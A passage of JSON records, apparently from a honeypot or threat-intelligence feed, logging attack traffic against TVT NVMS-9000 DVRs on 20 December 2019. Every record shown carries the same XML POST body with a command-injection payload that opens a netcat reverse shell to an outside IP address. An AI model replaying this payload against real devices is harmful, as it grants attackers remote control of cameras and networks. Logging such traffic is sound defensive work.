- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 21,
- "first_seen": "2019-12-20T20:49:56Z",
- "last_seen": "2019-12-20T20:49:56Z"
- },
- {
- "source_ip_address": "114.34.190.171",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T20:38:36Z",
- "last_seen": "2019-12-20T20:38:36Z"
- },
- {
- "source_ip_address": "201.137.132.93",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-20T15:25:56Z",
- "last_seen": "2019-12-20T20:27:11Z"
- },
- {
- "source_ip_address": "201.171.80.29",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T20:21:25Z",
- "last_seen": "2019-12-20T20:21:25Z"
- },
- {
- "source_ip_address": "187.171.77.229",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T19:52:13Z",
- "last_seen": "2019-12-20T19:52:13Z"
- },
- {
- "source_ip_address": "23.30.177.189",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T19:50:05Z",
- "last_seen": "2019-12-20T19:50:05Z"
- },
- {
- "source_ip_address": "114.32.168.103",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T19:49:33Z",
- "last_seen": "2019-12-20T19:49:33Z"
- },
- {
- "source_ip_address": "70.52.138.137",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T19:48:51Z",
- "last_seen": "2019-12-20T19:48:51Z"
- },
- {
- "source_ip_address": "187.226.9.193",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T19:19:25Z",
- "last_seen": "2019-12-20T19:19:25Z"
- },
- {
- "source_ip_address": "160.0.195.45",
- "country": "ZA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T19:18:00Z",
- "last_seen": "2019-12-20T19:18:00Z"
- },
- {
- "source_ip_address": "81.107.41.42",
- "country": "GB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T19:14:03Z",
- "last_seen": "2019-12-20T19:14:03Z"
- },
- {
- "source_ip_address": "219.85.140.219",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T19:10:08Z",
- "last_seen": "2019-12-20T19:10:08Z"
- },
- {
- "source_ip_address": "123.193.81.82",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T18:59:32Z",
- "last_seen": "2019-12-20T18:59:32Z"
- },
- {
- "source_ip_address": "5.128.140.5",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T18:57:37Z",
- "last_seen": "2019-12-20T18:57:37Z"
- },
- {
- "source_ip_address": "12.49.248.66",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T00:50:26Z",
- "last_seen": "2019-12-20T18:43:29Z"
- },
- {
- "source_ip_address": "200.46.69.202",
- "country": "PA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T18:43:01Z",
- "last_seen": "2019-12-20T18:43:01Z"
- },
- {
- "source_ip_address": "189.151.49.34",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T18:38:39Z",
- "last_seen": "2019-12-20T18:38:39Z"
- },
- {
- "source_ip_address": "189.223.181.196",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T18:34:59Z",
- "last_seen": "2019-12-20T18:34:59Z"
- },
- {
- "source_ip_address": "150.117.88.238",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T18:29:14Z",
- "last_seen": "2019-12-20T18:29:14Z"
- },
- {
- "source_ip_address": "94.49.205.100",
- "country": "SA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 37,
- "first_seen": "2019-12-20T18:02:02Z",
- "last_seen": "2019-12-20T18:02:02Z"
- },
- {
- "source_ip_address": "115.90.93.252",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T17:50:18Z",
- "last_seen": "2019-12-20T17:50:18Z"
- },
- {
- "source_ip_address": "99.239.82.168",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T17:49:17Z",
- "last_seen": "2019-12-20T17:49:17Z"
- },
- {
- "source_ip_address": "114.35.182.27",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-20T17:19:43Z",
- "last_seen": "2019-12-20T17:19:43Z"
- },
- {
- "source_ip_address": "87.17.205.42",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T17:14:36Z",
- "last_seen": "2019-12-20T17:14:36Z"
- },
- {
- "source_ip_address": "187.131.48.221",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T17:14:16Z",
- "last_seen": "2019-12-20T17:14:16Z"
- },
- {
- "source_ip_address": "147.158.109.38",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T07:02:46Z",
- "last_seen": "2019-12-20T17:06:36Z"
- },
- {
- "source_ip_address": "95.78.114.244",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T16:38:23Z",
- "last_seen": "2019-12-20T16:38:23Z"
- },
- {
- "source_ip_address": "187.111.209.179",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
